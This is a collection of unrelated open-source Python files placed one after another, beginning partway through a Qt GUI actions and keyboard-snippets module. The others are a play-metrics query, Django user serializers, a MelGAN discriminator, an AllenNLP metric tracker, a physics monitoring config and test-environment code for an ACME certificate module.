# Show an input dialog if there are args.
callback = kwargs.get('callback', None)
title = getattr(callback, '__name__', 'action')
# Number of expected arguments.
n_args = kwargs.get('n_args', None) or len(_expected_args(callback))
@wraps(callback)
def wrapped(is_checked, *args):
if kwargs.get('checkable', None):
args = (is_checked,) + args
if kwargs.get('prompt', None):
args += _prompt_args(
title, docstring, default=kwargs.get('prompt_default', None)) or ()
if not args: # pragma: no cover
logger.debug("User cancelled input prompt, aborting.")
return
if len(args) < n_args:
logger.warning(
"Invalid function arguments: expecting %d but got %d", n_args, len(args))
return
try:
# Set a busy cursor if set_busy is True.
with busy_cursor(kwargs.get('set_busy', None)):
return callback(*args)
except Exception: # pragma: no cover
logger.warning("Error when executing action %s.", name)
logger.debug(''.join(traceback.format_exception(*sys.exc_info())))
action.triggered.connect(wrapped)
sequence = _get_qkeysequence(kwargs.get('shortcut', None))
if not isinstance(sequence, (tuple, list)):
sequence = [sequence]
action.setShortcuts(sequence)
assert kwargs.get('docstring', None)
docstring = re.sub(r'\s+', ' ', kwargs.get('docstring', None))
docstring += ' (alias: {})'.format(kwargs.get('alias', None))
action.setStatusTip(docstring)
action.setWhatsThis(docstring)
action.setCheckable(kwargs.get('checkable', None))
action.setChecked(kwargs.get('checked', None))
if kwargs.get('icon', None):
action.setIcon(_get_icon(kwargs['icon']))
return action
class Actions(object):
"""Group of actions bound to a GUI.
This class attaches to a GUI and implements the following features:
* Add and remove actions
* Keyboard shortcuts for the actions
* Display all shortcuts
Constructor
-----------
gui : GUI instance
name : str
Name of this group of actions.
menu : str
Name of the GUI menu that will contain the actions.
submenu : str
Name of the GUI submenu that will contain the actions.
default_shortcuts : dict
Map action names to keyboard shortcuts (regular strings).
default_snippets : dict
Map action names to snippets (regular strings).
"""
def __init__(
self, gui, name=None, menu=None, submenu=None, view=None,
insert_menu_before=None, default_shortcuts=None, default_snippets=None):
self._actions_dict = {}
self._aliases = {}
self._default_shortcuts = default_shortcuts or {}
self._default_snippets = default_snippets or {}
assert name
self.name = name
self.menu = menu
self.submenu = submenu
self.view = view
self.view_submenu = None
self.insert_menu_before = insert_menu_before
self._view_submenus = {}
self.gui = gui
gui.actions.append(self)
# Create the menu when creating the Actions instance.
if menu:
gui.get_menu(menu, insert_menu_before)
def _get_menu(self, menu=None, submenu=None, view=None, view_submenu=None):
"""Return the QMenu depending on a combination of keyword arguments."""
# Defaults.
menu = menu or self.menu
submenu = submenu or self.submenu
view = view or self.view
view_submenu = view_submenu or self.view_submenu
# If the action is a view action, it should be added to the view's menu in the dock widget.
if view:
if view_submenu and view_submenu not in self._view_submenus:
self._view_submenus[view_submenu] = view.dock._menu.addMenu(view_submenu)
if view_submenu:
return self._view_submenus[view_submenu]
else:
return view.dock._menu
# Create the submenu if there is one.
if submenu:
# Create the submenu.
self.gui.get_submenu(menu, submenu)
# Make sure the action gets added to the submenu.
menu = submenu
if menu:
return self.gui.get_menu(menu)
def add(self, callback=None, name=None, shortcut=None, alias=None, prompt=False, n_args=None,
docstring=None, menu=None, submenu=None, view=None, view_submenu=None, verbose=True,
checkable=False, checked=False, set_busy=False, prompt_default=None,
show_shortcut=True, icon=None, toolbar=False):
"""Add an action with a keyboard shortcut.
Parameters
----------
callback : function
Take no argument if checkable is False, or a boolean (checked) if it is True
name : str
Action name, the callback's name by default.
shortcut : str
The keyboard shortcut for this action.
alias : str
Snippet, the name by default.
prompt : boolean
Whether this action should display a dialog with an input box where the user can
write arguments to the callback function.
n_args : int
If prompt is True, specify the number of expected arguments.
set_busy : boolean
Whether to use a busy cursor while performing the action.
prompt_default : str
The default text in the input text box, if prompt is True.
docstring : str
The action docstring, to be displayed in the status bar when hovering over the action
item in the menu. By default, the function's docstring.
menu : str
The name of the menu where the action should be added. It is automatically created
if it doesn't exist.
submenu : str
The name of the submenu where the action should be added. It is automatically created
if it doesn't exist.
view : QWidget
A view that belongs to the GUI, if the actions are to be added to the view's menu bar.
view_submenu : str
The name of a submenu in the view menu.
checkable : boolean
Whether the action is checkable (toggle on/off).
checked : boolean
Whether the checkable action is initially checked or not.
show_shortcut : boolean
Whether to show the shortcut in the Help action that displays all GUI shortcuts.
icon : str
Hexadecimal code of the font-awesome icon.
toolbar : boolean
Whether to add the action to the toolbar.
"""
param_names = sorted(inspect.signature(Actions.add).parameters)
l = locals()
kwargs = {param_name: l[param_name] for param_name in param_names if param_name != 'self'}
if callback is None:
# Allow to use either add(func) or @add or @add(...).
kwargs.pop('callback', None)
return partial(self.add, **kwargs)
assert callback
# Get the name from the callback function if needed.
name = name or callback.__name__
alias = alias or self._default_snippets.get(name, _alias(name)).split(' ')[0]
name = name.replace('&', '')
shortcut = shortcut or self._default_shortcuts.get(name, None)
# Skip existing action.
if name in self._actions_dict:
return
# Set the status tip from the function's docstring.
docstring = docstring or callback.__doc__ or name
docstring = re.sub(r'[ \t\r\f\v]{2,}', ' ', docstring.strip())
# Create and register the action.
kwargs.update(name=name, alias=alias, shortcut=shortcut, docstring=docstring)
action = _create_qaction(self.gui, **kwargs)
action_obj = Bunch(qaction=action, **kwargs)
if verbose and not name.startswith('_'):
logger.log(5, "Add action `%s` (%s).", name, _get_shortcut_string(action.shortcut()))
self.gui.addAction(action)
# Do not show private actions in the menu.
if not name.startswith('_'):
# Find the menu in which the action should be added.
qmenu = self._get_menu(
menu=menu, submenu=submenu, view=view, view_submenu=view_submenu)
if qmenu:
qmenu.addAction(action)
# Add the action to the toolbar.
if toolbar:
self.gui._toolbar.show()
self.gui._toolbar.addAction(action)
self._actions_dict[name] = action_obj
# Register the alias -> name mapping.
self._aliases[alias] = name
# Set the callback method.
if callback:
setattr(self, name.lower().replace(' ', '_').replace(':', ''), callback)
def separator(self, **kwargs):
"""Add a separator.
Parameters
----------
menu : str
The name of the menu where the separator should be added. It is automatically created
if it doesn't exist.
submenu : str
The name of the submenu where the separator should be added. It is automatically
created if it doesn't exist.
view : QWidget
A view that belongs to the GUI, if the separator is to be added to the view's menu bar.
view_submenu : str
The name of a submenu in the view menu.
"""
self._get_menu(**kwargs).addSeparator()
def disable(self, name=None):
"""Disable all actions, or only one if a name is passed."""
if name is None:
for name in self._actions_dict:
self.disable(name)
return
self._actions_dict[name].qaction.setEnabled(False)
def enable(self, name=None):
"""Enable all actions, or only one if a name is passed.."""
if name is None:
for name in self._actions_dict:
self.enable(name)
return
self._actions_dict[name].qaction.setEnabled(True)
def get(self, name):
"""Get a QAction instance from its name."""
return self._actions_dict[name].qaction if name in self._actions_dict else None
def run(self, name, *args):
"""Run an action as specified by its name."""
assert isinstance(name, str)
# Resolve the alias if it is an alias.
name = self._aliases.get(name, name)
# Get the action.
action = self._actions_dict.get(name, None)
if not action:
raise ValueError("Action `{}` doesn't exist.".format(name))
if not name.startswith('_'):
logger.debug("Execute action `%s`.", name)
try:
return action.callback(*args)
except TypeError as e:
logger.warning("Invalid action arguments: " + str(e))
return
def remove(self, name):
"""Remove an action."""
self.gui.removeAction(self._actions_dict[name].qaction)
del self._actions_dict[name]
delattr(self, name)
def remove_all(self):
"""Remove all actions."""
names = sorted(self._actions_dict.keys())
for name in names:
self.remove(name)
@property
def shortcuts(self):
"""A dictionary mapping action names to keyboard shortcuts."""
out = {}
for name in sorted(self._actions_dict):
action = self._actions_dict[name]
if not action.show_shortcut:
continue
# Discard actions without shortcut and without an alias.
if not action.shortcut and not action.alias:
continue
# Only show alias for actions with no shortcut.
alias_str = ' (:%s)' % action.alias if action.alias != name else ''
shortcut = action.shortcut or '-'
shortcut = shortcut if isinstance(action.shortcut, str) else ', '.join(shortcut)
out[name] = '%s%s' % (shortcut, alias_str)
return out
def show_shortcuts(self):
"""Display all shortcuts in the console."""
show_shortcuts_snippets(self)
def __contains__(self, name):
"""Whether the Actions group contains a specified action."""
return name in self._actions_dict
def __repr__(self):
return '<Actions {}>'.format(sorted(self._actions_dict))
# -----------------------------------------------------------------------------
# Snippets
# -----------------------------------------------------------------------------
class Snippets(object):
"""Provide keyboard snippets to quickly execute actions from a GUI.
This class attaches to a GUI and an `Actions` instance. To every command
is associated a snippet with the same name, or with an alias as indicated
in the action. The arguments of the action's callback functions can be
provided in the snippet's command with a simple syntax. For example, the
following command:
```
:my_action string 3-6
```
corresponds to:
```python
my_action('string', (3, 4, 5, 6))
```
The snippet mode is activated with the `:` keyboard shortcut. A snippet
command is activated with `Enter`, and one can leave the snippet mode
with `Escape`.
When the snippet mode is enabled (with `:`), this object adds a hidden Qt action
for every keystroke. These actions are removed when the snippet mode is disabled.
Constructor
-----------
gui : GUI instance
"""
# HACK: Unicode characters do not seem to work on Python 2
cursor = '\u200A\u258C'
# Allowed characters in snippet mode.
# A Qt shortcut will be created for every character.
_snippet_chars = r"abcdefghijklmnopqrstuvwxyz0123456789 ,.;?!_-+~=*/\(){}[]<>&|"
def __init__(self, gui):
self.gui = gui
self._status_message = gui.status_message
self.actions = Actions(gui, name='Snippets', menu='&File')
# Register snippet mode shortcut.
@self.actions.add(shortcut=':')
def enable_snippet_mode():
"""Enable the snippet mode (type action alias in the status
bar)."""
self.mode_on()
self._create_snippet_actions()
self.mode_off()
@property
def command(self):
"""This is used to write a snippet message in the status bar. A cursor is appended at
the end."""
msg = self.gui.status_message
n = len(msg)
n_cur = len(self.cursor)
return msg[:n - n_cur]
@command.setter
def command(self, value):
value += self.cursor
self.gui.unlock_status()
self.gui.status_message = value
self.gui.lock_status()
def _backspace(self):
"""Erase the last character in the snippet command."""
if self.command == ':':
return
logger.log(5, "Snippet keystroke `Backspace`.")
self.command = self.command[:-1]
def _enter(self):
"""Disable the snippet mode and execute the command."""
command = self.command
logger.log(5, "Snippet keystroke `Enter`.")
# NOTE: we need to set back the actions (mode_off) before running
# the command.
self.mode_off()
self.run(command)
def _create_snippet_actions(self):
"""Add mock Qt actions for snippet keystrokes.
Used to enable snippet mode.
"""
# One action per allowed character.
for i, char in enumerate(self._snippet_chars):
def _make_func(char):
def callback():
logger.log(5, "Snippet keystroke `%s`.", char)
self.command += char
return callback
# Lowercase letters.
self.actions.add(
name='_snippet_{}'.format(i),
shortcut=char,
callback=_make_func(char))
# Uppercase letters.
if char in self._snippet_chars[:26]:
self.actions.add(
name='_snippet_{}_upper'.format(i),
shortcut='shift+' + char,
callback=_make_func(char.upper()))
self.actions.add(
name='_snippet_backspace', shortcut='backspace', callback=self._backspace)
self.actions.add(
name='_snippet_activate', shortcut=('enter', 'return'), callback=self._enter)
self.actions.add(
name='_snippet_disable', shortcut='escape', callback=self.mode_off)
def run(self, snippet):
"""Execute a snippet command.
May be overridden.
"""
assert snippet[0] == ':'
snippet = snippet[1:]
snippet_args = _parse_snippet(snippet)
name = snippet_args[0]
logger.debug("Processing snippet `%s`.", snippet)
try:
# Try to run the snippet on all attached Actions instances.
for actions in self.gui.actions:
try:
actions.run(name, *snippet_args[1:])
return
except ValueError:
# This Actions instance doesn't contain the requested
# snippet, trying the next attached Actions instance.
pass
logger.warning("Couldn't find action `%s`.", name)
except Exception as e:
logger.warning("Error when executing snippet: \"%s\".", str(e))
logger.debug(''.join(traceback.format_exception(*sys.exc_info())))
def is_mode_on(self):
"""Whether the snippet mode is enabled."""
return self.command.startswith(':')
def mode_on(self):
"""Enable the snippet mode."""
logger.debug("Snippet mode enabled, press `escape` to leave this mode.")
# Save the current status message.
self._status_message = self.gui.status_message
self.gui.lock_status()
# Silent all actions except the Snippets actions.
for actions in self.gui.actions:
if actions != self.actions:
actions.disable()
self.actions.enable()
self.command = ':'
def mode_off(self):
"""Disable the snippet mode."""
self.gui.unlock_status()
# Reset the GUI status message that was set before the mode was
# activated.
self.gui.status_message = self._status_message
# Re-enable all actions except the Snippets actions.
self.actions.disable()
for actions in self.gui.actions:
if actions != self.actions:
actions.enable()
# The `:` shortcut should always be enabled.
self.actions.enable('enable_snippet_mode')
|
discovery-provider/src/queries/get_plays_metrics.py | atticwip/audius-protocol | 429 | 8761 | <gh_stars>100-1000
import logging
import time
from sqlalchemy import func, desc
from src.models import Play
from src.utils import db_session
logger = logging.getLogger(__name__)
def get_plays_metrics(args):
"""
Returns metrics for play counts
Args:
args: dict The parsed args from the request
args.start_time: date The start of the query
args.limit: number The max number of responses to return
args.bucket_size: string A date_trunc operation to aggregate timestamps by
Returns:
Array of dictionaries with the play counts and timestamp
"""
db = db_session.get_db_read_replica()
with db.scoped_session() as session:
return _get_plays_metrics(session, args)
def _get_plays_metrics(session, args):
metrics_query = (
session.query(
func.date_trunc(args.get("bucket_size"), Play.created_at).label(
"timestamp"
),
func.count(Play.id).label("count"),
)
.filter(Play.created_at > args.get("start_time"))
.group_by(func.date_trunc(args.get("bucket_size"), Play.created_at))
.order_by(desc("timestamp"))
.limit(args.get("limit"))
)
metrics = metrics_query.all()
metrics = [
{"timestamp": int(time.mktime(m[0].timetuple())), "count": m[1]}
for m in metrics
]
return metrics
|
python/tests/extractor/refmt.py | kho/cdec | 114 | 8765 | #!/usr/bin/env python
import collections, sys
lines = []
f = collections.defaultdict(int)
fe = collections.defaultdict(lambda: collections.defaultdict(int))
for line in sys.stdin:
tok = [x.strip() for x in line.split('|||')]
count = int(tok[4])
f[tok[1]] += count
fe[tok[1]][tok[2]] += count
lines.append(tok)
for tok in lines:
feat = 'IsSingletonF={0}.0 IsSingletonFE={1}.0'.format(
0 if f[tok[1]] > 1 else 1,
0 if fe[tok[1]][tok[2]] > 1 else 1)
print ' ||| '.join((tok[0], tok[1], tok[2], feat, tok[3]))
|
Toolkits/CMake/hunter/packages/sugar/python/sugar/sugar_warnings_wiki_table_generator.py | roscopecoltran/SniperKit-Core | 102 | 8773 | <reponame>roscopecoltran/SniperKit-Core
#!/usr/bin/env python3
# Copyright (c) 2014, <NAME>
# All rights reserved.
"""
* Wiki table for `leathers` C++ project
Expected format:
### Main table
Name | Clang | GCC | MSVC |
-----------------------------|----------|----------|------|
static-ctor-not-thread-safe | *no* | *no* | 4640 |
switch | **same** | **same** | 4062 |
switch-enum | **same** | **same** | 4061 |
### Xcode/Clang table
Clang | Xcode | Objective-C |
-----------------------|--------------------------------|-------------|
bool-conversion | CLANG_WARN_BOOL_CONVERSION | no |
c++11-extensions | CLANG_WARN_CXX0X_EXTENSIONS | no |
strict-selector-match | GCC_WARN_STRICT_SELECTOR_MATCH | yes |
undeclared-selector | GCC_WARN_UNDECLARED_SELECTOR | yes |
"""
def generate(main_warnings_table):
groups = set()
for i in main_warnings_table:
if i.group != "":
groups.add(i.group)
wiki_file = open("wiki-table.txt", "w")
generate_main_table(main_warnings_table, wiki_file)
for group in groups:
generate_group_table(main_warnings_table, wiki_file, group)
generate_xcode_table(main_warnings_table, wiki_file)
def generate_main_table(main_warnings_table, wiki_file):
head_name = "Name"
head_clang = "Clang"
head_gcc = "GCC"
head_msvc = "MSVC"
def calc_max(head, visitor):
max_len = len(head)
for x in main_warnings_table:
cur_len = visitor(x)
if cur_len > max_len:
max_len = cur_len
return max_len + 2
def name_visitor(table_entry):
if table_entry.group != "":
return 0
return len(table_entry.warning_name)
def clang_visitor(table_entry):
if table_entry.group != "":
return 0
return len(table_entry.clang.wiki_entry(table_entry.warning_name))
def gcc_visitor(table_entry):
if table_entry.group != "":
return 0
return len(table_entry.gcc.wiki_entry(table_entry.warning_name))
def msvc_visitor(table_entry):
if table_entry.group != "":
return 0
return len(table_entry.msvc.wiki_entry(table_entry.warning_name))
max_name = calc_max(head_name, name_visitor)
max_clang = calc_max(head_clang, clang_visitor)
max_gcc = calc_max(head_gcc, gcc_visitor)
max_msvc = calc_max(head_msvc, msvc_visitor)
def fill_string(name, max_name):
result = " " + name + " ";
assert(max_name >= len(result))
left = max_name - len(result)
return result + " " * left
wiki_file.write("### Main table\n\n")
s = "{}|{}|{}|{}|\n".format(
fill_string(head_name, max_name),
fill_string(head_clang, max_clang),
fill_string(head_gcc, max_gcc),
fill_string(head_msvc, max_msvc),
)
wiki_file.write(s)
s = "{}|{}|{}|{}|\n".format(
'-' * max_name,
'-' * max_clang,
'-' * max_gcc,
'-' * max_msvc,
)
wiki_file.write(s)
for entry in main_warnings_table:
if entry.group != "":
continue
s = "{}|{}|{}|{}|\n".format(
fill_string(entry.warning_name, max_name),
fill_string(entry.clang.wiki_entry(entry.warning_name), max_clang),
fill_string(entry.gcc.wiki_entry(entry.warning_name), max_gcc),
fill_string(entry.msvc.wiki_entry(entry.warning_name), max_msvc),
)
wiki_file.write(s)
def generate_group_table(main_warnings_table, wiki_file, group):
head_name = "Name"
head_clang = "Clang"
head_gcc = "GCC"
head_msvc = "MSVC"
def calc_max(head, visitor):
max_len = len(head)
for x in main_warnings_table:
cur_len = visitor(x)
if cur_len > max_len:
max_len = cur_len
return max_len + 2
def name_visitor(table_entry):
if table_entry.group != group:
return 0
return len(table_entry.warning_name)
def clang_visitor(table_entry):
if table_entry.group != group:
return 0
return len(table_entry.clang.wiki_entry(table_entry.warning_name))
def gcc_visitor(table_entry):
if table_entry.group != group:
return 0
return len(table_entry.gcc.wiki_entry(table_entry.warning_name))
def msvc_visitor(table_entry):
if table_entry.group != group:
return 0
return len(table_entry.msvc.wiki_entry(table_entry.warning_name))
max_name = calc_max(head_name, name_visitor)
max_clang = calc_max(head_clang, clang_visitor)
max_gcc = calc_max(head_gcc, gcc_visitor)
max_msvc = calc_max(head_msvc, msvc_visitor)
def fill_string(name, max_name):
result = " " + name + " ";
assert(max_name >= len(result))
left = max_name - len(result)
return result + " " * left
wiki_file.write("\n### Table for group: `{}`\n\n".format(group))
s = "{}|{}|{}|{}|\n".format(
fill_string(head_name, max_name),
fill_string(head_clang, max_clang),
fill_string(head_gcc, max_gcc),
fill_string(head_msvc, max_msvc),
)
wiki_file.write(s)
s = "{}|{}|{}|{}|\n".format(
'-' * max_name,
'-' * max_clang,
'-' * max_gcc,
'-' * max_msvc,
)
wiki_file.write(s)
for entry in main_warnings_table:
if entry.group != group:
continue
s = "{}|{}|{}|{}|\n".format(
fill_string(entry.warning_name, max_name),
fill_string(entry.clang.wiki_entry(entry.warning_name), max_clang),
fill_string(entry.gcc.wiki_entry(entry.warning_name), max_gcc),
fill_string(entry.msvc.wiki_entry(entry.warning_name), max_msvc),
)
wiki_file.write(s)
def generate_xcode_table(main_warnings_table, wiki_file):
head_clang = "Clang"
head_xcode = "Xcode"
head_objc = "Objective-C"
def calc_max(head, visitor):
max_len = len(head)
for x in main_warnings_table:
cur_len = visitor(x)
if cur_len > max_len:
max_len = cur_len
return max_len + 2
def clang_visitor(table_entry):
if table_entry.xcode.option == "":
return 0
return len(table_entry.clang.option)
def xcode_visitor(table_entry):
if table_entry.xcode.option == "":
return 0
return len(table_entry.xcode.option)
def objc_visitor(table_entry):
if table_entry.xcode.option == "":
return 0
if table_entry.objc:
return 3 # "yes"
else:
return 2 # "no"
max_clang = calc_max(head_clang, clang_visitor)
max_xcode = calc_max(head_xcode, xcode_visitor)
max_objc = calc_max(head_objc, objc_visitor)
def fill_string(name, max_name):
result = " " + name + " ";
assert(max_name >= len(result))
left = max_name - len(result)
return result + " " * left
wiki_file.write("\n\n### Xcode/Clang table\n\n")
s = "{}|{}|{}|\n".format(
fill_string(head_clang, max_clang),
fill_string(head_xcode, max_xcode),
fill_string(head_objc, max_objc),
)
wiki_file.write(s)
s = "{}|{}|{}|\n".format(
'-' * max_clang,
'-' * max_xcode,
'-' * max_objc,
)
wiki_file.write(s)
done_list = []
for entry in main_warnings_table:
if entry.xcode.option == "":
continue
if entry.clang.option in done_list:
continue
done_list.append(entry.clang.option)
if entry.objc:
objc = "yes"
else:
objc = "no"
s = "{}|{}|{}|\n".format(
fill_string(entry.clang.option, max_clang),
fill_string(entry.xcode.option, max_xcode),
fill_string(objc, max_objc),
)
wiki_file.write(s)
|
open/users/serializers.py | lawrendran/open | 105 | 8782 | import pytz
from rest_auth.serializers import TokenSerializer
from rest_framework.authtoken.models import Token
from rest_framework.exceptions import ValidationError
from rest_framework.fields import (
CharField,
CurrentUserDefault,
HiddenField,
UUIDField,
ChoiceField,
)
from rest_framework.serializers import ModelSerializer, Serializer
from rest_framework.validators import UniqueValidator
from django.contrib.auth.hashers import check_password
from open.users.models import User
class SimpleUserReadSerializer(ModelSerializer):
class Meta:
model = User
fields = (
"name",
"uuid",
)
class UserReadSerializer(ModelSerializer):
class Meta:
model = User
fields = (
"name",
"uuid",
"signed_up_from",
"date_joined",
"username",
"email",
"created",
"modified",
)
class UserTokenSerializer(TokenSerializer):
user = UserReadSerializer()
class Meta:
model = Token
fields = ["key", "user"]
# TODO - this view and serializer is on hold as you figure out registration (later)
class UserCreateSerializer(ModelSerializer):
username = CharField(validators=[UniqueValidator(queryset=User.objects.all())])
# need to make email optional ... prob should think through signup form a little
email = CharField(
validators=[UniqueValidator(queryset=User.objects.all())], required=False
)
password = CharField(write_only=True, min_length=8)
signed_up_from = CharField(
write_only=True, min_length=8, required=False, default="", trim_whitespace=True
)
timezone_string = ChoiceField(
choices=pytz.all_timezones, required=False, default="US/Eastern"
)
class Meta:
model = User
fields = ["username", "email", "password", "signed_up_from", "timezone_string"]
# TODO test - does this work with just username / no email, etc.
def create(self, validated_data):
username = validated_data.pop("username")
password = validated_data.pop("password")
is_betterself_user = False
if validated_data["signed_up_from"] == "betterself":
is_betterself_user = True
validated_data["is_betterself_user"] = is_betterself_user
user = User.objects.create(username=username, **validated_data)
user.set_password(password)
user.save()
return user
class UserDeleteSerializer(Serializer):
# most of this is actually redundant, i don't need to have a validation step, but i do this
# out of paranoia reasons that someone may delete their account by mistake
password = CharField()
user = HiddenField(default=CurrentUserDefault())
uuid = UUIDField()
def validate(self, data):
user = data["user"]
validated_password = check_password(data["password"], user.password)
if not validated_password:
raise ValidationError("Invalid Password Entered")
validated_uuid = str(user.uuid) == str(data["uuid"])
if not validated_uuid:
raise ValidationError("Invalid UUID", str(user.uuid))
validate_user = user.username != "<EMAIL>"
if not validate_user:
raise ValidationError(
f"This is a protected user and cannot be deleted. {user.username}"
)
return data
|
speech/melgan/model/multiscale.py | OthmaneJ/deep-tts | 213 | 8784 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .discriminator import Discriminator
from .identity import Identity
class MultiScaleDiscriminator(nn.Module):
def __init__(self):
super(MultiScaleDiscriminator, self).__init__()
self.discriminators = nn.ModuleList(
[Discriminator() for _ in range(3)]
)
self.pooling = nn.ModuleList(
[Identity()] +
[nn.AvgPool1d(kernel_size=4, stride=2, padding=2) for _ in range(1, 3)]
)
def forward(self, x):
ret = list()
for pool, disc in zip(self.pooling, self.discriminators):
x = pool(x)
ret.append(disc(x))
return ret # [(feat, score), (feat, score), (feat, score)]
|
allennlp/training/metric_tracker.py | MSLars/allennlp | 11,433 | 8791 | from typing import Optional, Dict, Any, List, Union
from allennlp.common.checks import ConfigurationError
class MetricTracker:
"""
This class tracks a metric during training for the dual purposes of early stopping
and for knowing whether the current value is the best so far. It mimics the PyTorch
`state_dict` / `load_state_dict` interface, so that it can be checkpointed along with
your model and optimizer.
Some metrics improve by increasing; others by decreasing. You can provide a
`metric_name` that starts with "+" to indicate an increasing metric, or "-"
to indicate a decreasing metric.
# Parameters
metric_name : `Union[str, List[str]]`
Specifies the metric or metrics to track. Metric names have to start with
"+" for increasing metrics or "-" for decreasing ones. If you specify more
than one, it tracks the sum of the increasing metrics metrics minus the sum
of the decreasing metrics.
patience : `int`, optional (default = `None`)
If provided, then `should_stop_early()` returns True if we go this
many epochs without seeing a new best value.
"""
def __init__(
self,
metric_name: Union[str, List[str]],
patience: Optional[int] = None,
) -> None:
self._patience = patience
self._best_so_far: Optional[float] = None
self._epochs_with_no_improvement = 0
self._is_best_so_far = True
self._epoch_number = 0
self.best_epoch: Optional[int] = None
self.best_epoch_metrics: Dict[str, float] = {}
if isinstance(metric_name, str):
metric_name = [metric_name]
self.tracked_metrics = []
for name in metric_name:
if name.startswith("+"):
self.tracked_metrics.append((1.0, name[1:]))
elif name.startswith("-"):
self.tracked_metrics.append((-1.0, name[1:]))
else:
raise ConfigurationError("metric_name must start with + or -")
def clear(self) -> None:
"""
Clears out the tracked metrics, but keeps the patience
"""
self._best_so_far = None
self._epochs_with_no_improvement = 0
self._is_best_so_far = True
self._epoch_number = 0
self.best_epoch = None
self.best_epoch_metrics.clear()
def state_dict(self) -> Dict[str, Any]:
"""
A `Trainer` can use this to serialize the state of the metric tracker.
"""
return {
"best_so_far": self._best_so_far,
"epochs_with_no_improvement": self._epochs_with_no_improvement,
"is_best_so_far": self._is_best_so_far,
"epoch_number": self._epoch_number,
"best_epoch": self.best_epoch,
"best_epoch_metrics": self.best_epoch_metrics,
}
def load_state_dict(self, state_dict: Dict[str, Any]) -> None:
"""
A `Trainer` can use this to hydrate a metric tracker from a serialized state.
"""
self._best_so_far = state_dict["best_so_far"]
self._epochs_with_no_improvement = state_dict["epochs_with_no_improvement"]
self._is_best_so_far = state_dict["is_best_so_far"]
self._epoch_number = state_dict["epoch_number"]
self.best_epoch = state_dict["best_epoch"]
# Even though we don't promise backwards compatibility for the --recover flag,
# it's particularly easy and harmless to provide it here, so we do it.
self.best_epoch_metrics = state_dict.get("best_epoch_metrics", {})
def add_metrics(self, metrics: Dict[str, float]) -> None:
"""
Record a new value of the metric and update the various things that depend on it.
"""
combined_score = self.combined_score(metrics)
new_best = (self._best_so_far is None) or (combined_score > self._best_so_far)
if new_best:
self._best_so_far = combined_score
self._epochs_with_no_improvement = 0
self._is_best_so_far = True
self.best_epoch = self._epoch_number
else:
self._epochs_with_no_improvement += 1
self._is_best_so_far = False
self._epoch_number += 1
def is_best_so_far(self) -> bool:
"""
Returns true if the most recent value of the metric is the best so far.
"""
return self._is_best_so_far
def should_stop_early(self) -> bool:
"""
Returns true if improvement has stopped for long enough.
"""
if self._patience is None:
return False
else:
return self._epochs_with_no_improvement >= self._patience
def combined_score(self, metrics: Dict[str, float]) -> float:
try:
return sum(
factor * metrics[metric_name] for factor, metric_name in self.tracked_metrics
)
except KeyError as e:
raise ConfigurationError(
f"You configured the trainer to use the {e.args[0]} "
"metric for early stopping, but the model did not produce that metric."
)
|
DQM/L1TMonitor/python/L1TGCT_cfi.py | ckamtsikis/cmssw | 852 | 8798 | import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
l1tGct = DQMEDAnalyzer('L1TGCT',
gctCentralJetsSource = cms.InputTag("gctDigis","cenJets"),
gctForwardJetsSource = cms.InputTag("gctDigis","forJets"),
gctTauJetsSource = cms.InputTag("gctDigis","tauJets"),
gctIsoTauJetsSource = cms.InputTag("gctDigis","fake"),
gctEnergySumsSource = cms.InputTag("gctDigis"),
gctIsoEmSource = cms.InputTag("gctDigis","isoEm"),
gctNonIsoEmSource = cms.InputTag("gctDigis","nonIsoEm"),
monitorDir = cms.untracked.string("L1T/L1TGCT"),
verbose = cms.untracked.bool(False),
stage1_layer2_ = cms.bool(False),
DQMStore = cms.untracked.bool(True),
disableROOToutput = cms.untracked.bool(True),
filterTriggerType = cms.int32(1)
)
|
tests/integration/lambdas/lambda_python3.py | jorges119/localstack | 31,928 | 8806 | <reponame>jorges119/localstack
# simple test function that uses python 3 features (e.g., f-strings)
# see https://github.com/localstack/localstack/issues/264
def handler(event, context):
# the following line is Python 3.6+ specific
msg = f"Successfully processed {event}" # noqa This code is Python 3.6+ only
return event
|
test/modules/md/md_env.py | icing/mod_md | 320 | 8810 | import copy
import inspect
import json
import logging
import pytest
import re
import os
import shutil
import subprocess
import time
from datetime import datetime, timedelta
from configparser import ConfigParser, ExtendedInterpolation
from typing import Dict, List, Optional
from pyhttpd.certs import CertificateSpec
from .md_cert_util import MDCertUtil
from pyhttpd.env import HttpdTestSetup, HttpdTestEnv
from pyhttpd.result import ExecResult
log = logging.getLogger(__name__)
class MDTestSetup(HttpdTestSetup):
def __init__(self, env: 'HttpdTestEnv'):
super().__init__(env=env)
def make(self):
super().make(add_modules=["proxy_connect", "md"])
if "pebble" == self.env.acme_server:
self._make_pebble_conf()
def _make_pebble_conf(self):
our_dir = os.path.dirname(inspect.getfile(MDTestSetup))
conf_src_dir = os.path.join(our_dir, 'pebble')
conf_dest_dir = os.path.join(self.env.gen_dir, 'pebble')
if not os.path.exists(conf_dest_dir):
os.makedirs(conf_dest_dir)
for name in os.listdir(conf_src_dir):
src_path = os.path.join(conf_src_dir, name)
m = re.match(r'(.+).template', name)
if m:
self._make_template(src_path, os.path.join(conf_dest_dir, m.group(1)))
elif os.path.isfile(src_path):
shutil.copy(src_path, os.path.join(conf_dest_dir, name))
class MDTestEnv(HttpdTestEnv):
MD_S_UNKNOWN = 0
MD_S_INCOMPLETE = 1
MD_S_COMPLETE = 2
MD_S_EXPIRED = 3
MD_S_ERROR = 4
EMPTY_JOUT = {'status': 0, 'output': []}
DOMAIN_SUFFIX = "%d.org" % time.time()
LOG_FMT_TIGHT = '%(levelname)s: %(message)s'
@classmethod
def get_acme_server(cls):
return os.environ['ACME'] if 'ACME' in os.environ else "pebble"
@classmethod
def has_acme_server(cls):
return cls.get_acme_server() != 'none'
@classmethod
def has_acme_eab(cls):
return cls.get_acme_server() == 'pebble'
@classmethod
def is_pebble(cls) -> bool:
return cls.get_acme_server() == 'pebble'
@classmethod
def lacks_ocsp(cls):
return cls.is_pebble()
def __init__(self, pytestconfig=None, setup_dirs=True):
super().__init__(pytestconfig=pytestconfig,
local_dir=os.path.dirname(inspect.getfile(MDTestEnv)),
interesting_modules=["md"])
self._acme_server = self.get_acme_server()
self._acme_tos = "accepted"
self._acme_ca_pemfile = os.path.join(self.gen_dir, "apache/acme-ca.pem")
if "pebble" == self._acme_server:
self._acme_url = "https://localhost:14000/dir"
self._acme_eab_url = "https://localhost:14001/dir"
elif "boulder" == self._acme_server:
self._acme_url = "http://localhost:4001/directory"
